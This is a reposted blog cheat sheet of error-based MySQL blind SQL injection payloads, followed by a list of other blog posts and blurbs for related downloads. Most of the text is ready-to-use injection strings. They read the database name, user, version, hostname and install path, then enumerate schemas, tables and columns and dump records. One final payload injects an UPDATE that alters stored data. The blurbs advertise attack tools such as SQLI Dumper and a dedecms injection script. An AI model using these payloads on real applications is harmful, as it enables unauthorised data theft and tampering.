mysql (error based) blind sqli cheat sheet_2012到了!!!
2012年01月10日
Quick & Dirty MySQL (Error Based) Blind SQLi Cheat Sheet
So, you have a web application vulnerable to Blind SQL Injection (test the param with single quote ' ) and you need dirty & quick cheats to dig deeper.
Note: The data is fetched using a Hex() and a type casting with the cast() to make the query reliable and avoid bad characters and format strings issue (for example 0x00 as the last byte of every data fetched.) These payloads heavily rely on the information_schema database. So if you don't get the desired result, it just means that the remote database server doesn't have it.
These payloads are only crafted for Error-based MySQL Blind SQL Injections using String type parameters. If you know what I'm talking about, go play!
No more crap, straight to the point.
1. To test blind injection
Code:
' and 'x'='x
2. To select the current database (Output will be in Hexadecimal, decode to ASCII
Code:
' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
3. To find the current user
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
4. To find MySQL Version
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
5. Find current database
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
6. To find the system user
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
7. To find the hostname
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
8. To find the installation directory
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
9. To find the DB User
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
10. To find the databases
Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting a response.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
11. To count the number of tables in the selected database
Note: Note this count as n
Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
12. To get the table names in the selected database
Note: m-n implies execute this query starting from m, m+1…n-1
Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
13. To get number of columns in the selected table name
Note: Note this count as n
Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
14. To get column names of a selected table name
Note: m-n implies execute this query starting from m, m+1…n-1
Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
15. To count the number of records in a selected column
Note: Remember this count as n
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
16. To fetch records from a selected column
Note: m-n implies execute this query starting from m, m+1…n-1
Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
17. Update a record in the selected column
Code:
1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--
I will update the cheat sheets for other database servers too in separate posts. Keep watching. Till then take care and bye.
发表评论
-
9-socket的实践到内核--client调用connect
2012-01-20 10:50 8559-socket的实践到内核--client调用connect ... -
Kobject相关
2012-01-20 10:49 498Kobject相关 2010年06月24日 作者:李强, ... -
一个操作系统的实现实验之3.2.1
2012-01-20 10:49 757一个操作系统的实现实 ... -
基于at91rm9200的arm平台 kgdb+linux内核调试
2012-01-20 10:49 1216基于at91rm9200的arm平台 kgdb+linux内核 ... -
MySQL的优化(本文是Monty在O'Reilly Open Source Convention 2000大会上的演讲)(摘自老叶的博客,有删改)
2012-01-20 10:49 544MySQL的优化(本文是Monty在O'Reilly Open ... -
FastCGI Error 2147467259 (0x80004005)
2012-01-19 15:48 1839FastCGI Error 2147467259 (0x800 ... -
复制slave-skip-errors及error查看
2012-01-19 15:48 1403复制slave-skip-errors及error查看 20 ... -
error C2332: “struct”: 缺少标记名
2012-01-19 15:48 4953error C2332: “struct”: 缺少标记名 2 ... -
HTTP Error 503. The service is unavailable
2012-01-19 15:48 1032HTTP Error 503. The service is ... -
<改文>拽少爷的校花女友<33>
2012-01-17 05:30 632拽少爷的校花女友 2012 ... -
如果允许.
2012-01-17 05:30 582如果允许. 2012年01月12日 来自喧嚣世界的少女 ... -
―挑战你的极限―(短篇医院感人鬼故事两则)
2012-01-17 05:30 1091―挑战你的极限―(短篇 ... -
中国人的用餐礼仪~~~有空大家看看,蛮受用的哦
2012-01-16 04:26 633中国人的用餐礼仪~~~有空大家看看,蛮受用的哦 2009年0 ... -
汉服宣传资料
2012-01-16 04:26 636汉服宣传资料 2011年12月28日 什么是汉服? ... -
jjk
2012-01-16 04:26 523jjk 2011年12月25日 ... -
中秋节的来历
2012-01-16 04:25 732中秋节的来历 2011年12 ... -
儒家思想
2012-01-16 04:25 726儒家思想 2012年01月14日 ...
相关推荐
SQLI-LABS是一个学习SQLI的平台,可用于在web安全攻防、SQL注入中进行测试。但是由于新的php版本不兼容问题,原始的sqli会出现问题,这是热心网友修改过的版本,可以在新版本的php中使用。
网络,安全
SQL-labs靶场,练习sql注入,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习
SQLI Dumper v8.3SQLI Dumper v8.3
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
SQLI DUMPER V10.2 working
sqli 基于时间盲注的脚本文件 1-10 全部适用。通过修改url便可以进行注入。
主要介绍了在Django框架中伪造捕捉到的URLconf值的方法,Django是Python各色人气框架中最为著名的一个,需要的朋友可以参考下
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
sqlilabs靶场全部关卡的详细解析,pdf文档
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqli tool for searching vulnarabiliti for your website
MYSQL_注入天书--_Sqli-labs_使用手册.pdf
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli1_14.tar.gz为修改过的sqli-labs-master前14课的内容。
SQL / SQLI标记生成器解析器分析器。 为了 C和C ++ (外部端口) [LuaJIT / FFI]( )(外部端口) 有关详细信息和演示,请参见 。 简单的例子: # include # include # include # include " libinjection.h...
到目前为止,它检查: 信息泄漏 命令执行 代码执行 SQL LFI / RFI 大部分搜索都是由@dustyfresh创建的,他将其编译归功于他! 我只是将整个过程自动化到这个脚本中 用法:编辑路径以指向要检查的项目的根目录。 ...
sqlilabs, 渗透测试, 网络攻防,数据库安全, mysql,sql
学习sql注入的开源平台
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html